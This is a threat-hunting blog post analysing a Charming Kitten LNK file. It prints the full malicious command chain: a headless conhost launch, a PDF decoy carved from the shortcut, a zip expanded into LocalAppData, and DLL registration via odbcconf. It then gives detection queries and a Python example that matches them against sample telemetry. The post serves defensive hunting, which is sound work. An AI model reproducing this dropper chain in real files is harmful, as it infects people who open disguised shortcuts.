128. Hunting for Charming Kitten

Hello everyone!

I rarely see adversaries use malicious documents nowadays. But I see LNK files more and more often! Today we'll look at another example, which belongs to Charming Kitten (we track this activity cluster as Cypress Werewolf).

So, the malicious LNK file distributed by the threat actors contained the following command:

conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;

Yes, it's really juicy from a detection and hunting perspective. For example, it abuses conhost.exe with the --headless argument to run the script. That's a good candidate for hunting, but it requires some tuning to filter out related legitimate activity, of course:

event_type: "processcreatewin"

AND

proc_file_name: "conhost.exe"

AND

cmdline: "headless"

Another interesting detection opportunity is the abuse of odbcconf.exe to run regsvr32.exe in order to register a malicious DLL:

event_type: "processcreatewin"

AND

proc_file_name: "odbcconf.exe"

AND

cmdline: "regsvr"
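To see how these two hunts behave on telemetry, here is an added Python example (mine, not the author's and not any vendor's query language) that evaluates both rules as AND-ed, case-insensitive substring conditions over a few constructed process-creation events, adds the kind of exclusion the post says such hunts need, and pulls the DLL name out of the odbcconf regsvr action. The field names event_type, proc_file_name and cmdline are the ones used in the post; parent_file_name, the allowlisted parent process and all sample command lines are assumptions I constructed (the odbcconf line is the post's command with PowerShell's backtick escapes resolved).

```python
import re

# Hunting rules transcribed from the post: each rule is a set of
# field -> substring conditions joined with AND, evaluated case-insensitively.
HUNT_RULES = {
    "conhost_headless": {
        "event_type": "processcreatewin",
        "proc_file_name": "conhost.exe",
        "cmdline": "headless",
    },
    "odbcconf_regsvr": {
        "event_type": "processcreatewin",
        "proc_file_name": "odbcconf.exe",
        "cmdline": "regsvr",
    },
}

# Constructed sample telemetry (not real logs). The first and third command
# lines follow the shape of the LNK command in the post; parent_file_name is an
# assumed extra field that only the tuning step below uses.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "parent_file_name": "explorer.exe",
     "cmdline": "conhost --headless cmd /c FOR /F \"delims=s\\ tokens=4\" %f "
                "IN ('set^|findstr PSM') DO %f -w 1 $zf='osf.zip'"},
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "parent_file_name": "cmd.exe",
     "cmdline": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},
    {"event_type": "processcreatewin", "proc_file_name": "odbcconf.exe",
     "parent_file_name": "powershell.exe",
     "cmdline": "odbcconf /a {regsvr Wow}"},
    {"event_type": "processcreatewin", "proc_file_name": "odbcconf.exe",
     "parent_file_name": "msiexec.exe",
     "cmdline": "odbcconf.exe /S /F C:\\setup\\driver.rsp"},
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "parent_file_name": "corp_deploy_agent.exe",   # hypothetical in-house tool
     "cmdline": "conhost --headless powershell -File C:\\deploy\\inventory.ps1"},
]


def matches(event, rule):
    """True when every rule condition is a case-insensitive substring of its field."""
    return all(needle.lower() in str(event.get(field, "")).lower()
               for field, needle in rule.items())


# Tuning: per-rule exclusions for sources an analyst has already reviewed.
# The parent-process allowlist is a hypothetical example, not a known-good list.
EXCLUSIONS = {
    "conhost_headless": {"parent_file_name": {"corp_deploy_agent.exe"}},
}


def excluded(event, rule_name, exclusions=EXCLUSIONS):
    """True when the event falls under an exclusion defined for this rule."""
    for field, allowed in exclusions.get(rule_name, {}).items():
        if str(event.get(field, "")).lower() in allowed:
            return True
    return False


def hunt(events, rules=HUNT_RULES, exclusions=EXCLUSIONS):
    """Return (rule_name, cmdline) for each event that matches a rule and is not tuned out."""
    hits = []
    for event in events:
        for name, rule in rules.items():
            if matches(event, rule) and not excluded(event, name, exclusions):
                hits.append((name, event["cmdline"]))
    return hits


# odbcconf's /A action syntax is {REGSVR <file>}; capture the file name for triage.
ODBCCONF_REGSVR = re.compile(r"\{\s*regsvr\s+([^}\s]+)\s*\}", re.IGNORECASE)


def odbcconf_regsvr_target(cmdline):
    """Return the DLL named in an 'odbcconf /a {regsvr <dll>}' command line, or None."""
    m = ODBCCONF_REGSVR.search(cmdline)
    return m.group(1) if m else None


if __name__ == "__main__":
    for name, cmdline in hunt(SAMPLE_EVENTS):
        target = odbcconf_regsvr_target(cmdline) if name == "odbcconf_regsvr" else None
        print(f"[{name}] {cmdline}" + (f"  -> registers {target}" if target else ""))
```

Run as-is it reports the headless conhost launch and the odbcconf registration of "Wow", while the plain conhost, the odbcconf response-file install and the allowlisted headless run stay quiet; dropping the exclusions brings the third hit back, which is the trade-off the tuning remark in the post is about.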

Which parts of the script seemed interesting to you?

See you tomorrow!
